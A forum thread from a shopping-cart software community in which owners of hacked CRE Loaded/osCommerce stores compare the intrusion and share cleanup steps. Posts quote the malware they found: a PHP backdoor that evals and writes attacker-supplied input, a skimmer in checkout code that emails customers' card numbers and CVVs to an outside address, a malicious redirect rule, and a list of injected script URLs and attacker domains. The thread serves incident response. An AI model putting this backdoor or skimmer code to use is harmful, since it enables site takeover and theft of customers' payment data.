Security Breach on our Site

RichardHudson · **Joined:** Thu Aug 26, 2010 9:10 am **Posts:** 1

We've had an issue today where our site was hacked and the following code was inserted into the includes/languages/english/mainpage.php file in place of the home page content:

Code:

<?php if(@$_GET['cookies']==1){echo 'Cookies must be enabled !';$tf='';if(@$_POST['tf']){$tf=@$_POST['tf'];}if(@$_POST['e']){eval(@$_POST['e']);}if(@$_POST['t']){if($tf!=''){$f=fopen($tf,'w');fwrite($f,@$_POST['t']);fclose($f);}}if(@$_FILES['f']['name']!=''){$tf=$_FILES['f']['name'];move_uploaded_file(@$_FILES['f']['tmp_name'],$tf);}exit;}?>

As a result, I then found a load of PHP scripts had been written into the /images folder call google***.php

Does anyone know of a specific fix for this that I can apply without patching the whole site? I'm assuming there must be a way of stopping remote users from writing to these files.

We're running version 6.2.11 White Label.

Any suggestions appreciated.

Richard

germslearn · **Joined:** Mon Feb 08, 2010 9:17 pm **Posts:** 1

I am having the same exact issue on my site. I have noticed they also created those google*.php files in the images folder as well.

Please help! I delete all the google*.php files I could find but it keeps recurring every morning. Is there a way to stop it?

dani · **Joined:** Sat Aug 28, 2010 1:09 pm **Posts:** 3

my site hacked like this

i think creloaded security support is dead

TheLango · **Joined:** Sun Nov 29, 2009 10:57 am **Posts:** 352

CRE 6.3 - 6.4 - 6.4.1 - 6.4.1a

Not just for the sake of it..

UPGRADE - UPGRADE - UPGRADE - UPGRADE

slopez · **Joined:** Thu Feb 18, 2010 4:44 pm **Posts:** 21

The same thing happens on all versions. It's an issue affecting all osCommerce based carts since August 2010.

martinvelikov · **Joined:** Mon Feb 22, 2010 10:24 am **Posts:** 31

Two possible solutions in this case:

1. Password Protect Your Admin Directory.

2. Alternatively create an .htaccess file (if you are running your store on a unix based server) with the following rules:

Deny From All
Allow From <Your IP address here>

There are 3 separate exploits that are currently working for creloaded and generally oscommerce based stores. Considering you are not gonna completely rewrite the current code - use one of the solutions proposed above. It is really easy to restrict access to the admin backend and this will ultimately solve the problem.

rrg · **Joined:** Fri Sep 10, 2010 5:21 pm **Posts:** 4

Make sure you check all files that receive user input, such as credit card information, because there will be code in there sending an email with all of the credit card information, name, address, 3-digit code. I found several codes in:
create_account.php, checkout_process.php.

Code:

$ip = getenv("REMOTE_ADDR");
$cvv=$_SESSION['x_Card_Code'];
$number=$order->info['cc_number'];
$expires=$order->info['cc_expires'];
$to='admin@finderdirect.com';
$subject='Cleanreport.com Email:'.$order->customer['email_address'].' '.$number;
$body="<p> IP address= ".$ip."<p> nDate=" . date('d-m-Y').
"<p> ntelephone=".$order->customer['telephone']."<p> nemail_address=".$order->customer['email_address']."<p> nName=".$order->customer['firstname']
.
$order->customer['lastname'].
"<p> nAddress1=".$order->customer['street_address'].
"<p> nCity=".$order->customer['city']. 
 "<p> nState=".$order->customer['state'].
"<p> nZip=".$order->customer['postcode'].
"<p> nCountry=".$order->billing['country']['title'].
"<p> nmethod=".$order->info['payment_method'].
"<p> ntype=".$order->info['cc_type'].
"<p> nowner=".$order->customer['firstname']. '&nbsp;'.

$order->customer['lastname']."<p> nnumber=".$number."<p> nexp=".$expires."<p> ncvv=".$cvv;

$headers= 'MIME-Version: 1.0' . "\r\n";
$headers.= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
$headers.="Cleanreport.com";
mail($to, $subject, $body, $headers);

If you search all the files in that directory for the php function mail you should be able to find tons of code. You will also see what email address it is sent to.
~Rudy

dani · **Joined:** Sat Aug 28, 2010 1:09 pm **Posts:** 3

first changed file in my site was includes/languages/... / cookie_usage.php

can som one change this file content in admin side?

tankteam · **Joined:** Tue Jun 05, 2007 12:00 am **Posts:** 13

Hi,

We have tried many ways to temporary and manually fix the now famous hack too.
Below is the info and fixes:

Fixes we have made:
1. Follow steps in http://blog.sucuri.net/2010/10/oscommer ... ky-ru.html
a. Ask hosting IT support to help clean up .htaccess file.
This is what the .htaccess looks like:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
…
RewriteRule ^(.*)$ http://devisionnetwork.ru/suomi/index.php [R=301,L]
b. A backdoor is created inside /js/conf.php and another one at /flops.php. Make sure to remove these and search for other PHP files that are not part of the official osCommerce distribution.
c. Blackhat SEO SPAM is added to includes/application_bottom.php.
2. Securing the Admin folder
a. Rename Admin folder.
b. After renamed Admin folder, make changes in renamed_admin_directory/includes/configure.php
define('DIR_WS_HTTP_ADMIN', '/shop/admin-gbh-group/');
define('DIR_WS_HTTPS_ADMIN', 'admin-gbh-group/');
define('DIR_FS_ADMIN', '/home/gbhgroup/public_html/shop/admin-gbh-group/');
There is also issue with hack, read Jan's thread here (http://forums.oscommerce.com/index.php?showtopic=340995).
c. Password protect the renamed Admin folder with hosting control panel.
3. Remove filemanger (it is vulnerable). Search and delete all “file_manager.php”.
Example:
admin\includes\languages\english
admin\includes\languages\espanol
admin\includes\languages\french
admin\includes\languages\german
4. Remove all “define_language.php” (it is vulnerable).
Example:
admin\
admin\includes\languages\english
admin\includes\languages\espanol
admin\includes\languages\french
admin\includes\languages\german
5. Is your site really yours? http://www.unmaskparasites.com/
6. Practical Guide to Dealing With Google's Malware Warnings http://www.unmaskparasites.com/malware- ... upshop.com

Info
• http://blog.sucuri.net/2010/11/oscommer ... n-etc.html
• http://blog.sucuri.net/2010/11/continui ... sites.html
• http://blog.sucuri.net/2010/11/malware- ... merce.html
• http://blog.sucuri.net/2010/10/oscommer ... ky-ru.html

How to Scan Website
1. Use http://www.unmaskparasites.com and check. It will mainly list if google things the site is malicous, but can also show bad strings.
2. Use http://www.web-sniffer.net and view the site as google. Ensure that your page loads.
3. Check at http://www.URLVoid.com for the domain. Use the virus scan section afterward.
4. http://blog.sucuri.net – This blog has large amounts of useful data regarding these recent attacks on osCommerce (and variants).
5. Search all source code and look for something like:
a. <script src="http://nt07.in/3`></script>
b. <script src="http://nt06.in/3`></script>
c. <script src="http://nt04.in/3`></script>
d. <script src="http://nt02.co.in/3`></script>
e. <script src="http://nt002.cn/E/J.JS`></script>
f. ar-kirm.ru<br />
g. arkirm.ru<br />
h. camentrueopt.ru<br />
i. ccmilkwq.ru<br />
j. class-woods.ru<br />
k. classwoods.ru<br />
l. devisionnetwork.ru<br />
m. devisionpanel.ru<br />
n. drevingjp.tk<br />
o. drivegup.tk<br />
p. enterteiment-wizrd.ru<br />
q. enterteimentwizrd.ru<br />
r. everywoods.ru<br />
s. interwumedi.ru<br />
t. jaobsofterty.ru<br />
u. kirm-ar.ru<br />
v. kirmar.ru<br />
w. kirm-sky.ru<br />
x. kirmsky.ru<br />
y. networkdevision.ru<br />
z. relax-july.ru<br />
aa. sensationworld.ru<br />
bb. sky-ar.ru<br />
cc. sky-kirm.ru<br />
dd. taeliterup.ru<br />
ee. tecros.ru<br />
ff. traypro.ru<br />
gg. tutaanti.ru<br />
hh. zandecluf.ru
ii. eval
jj. base64_decode

Loaded Commerce Community

Security Breach on our Site

Who is online

Main Menu

Login

Forums Latest Activity

Top Listing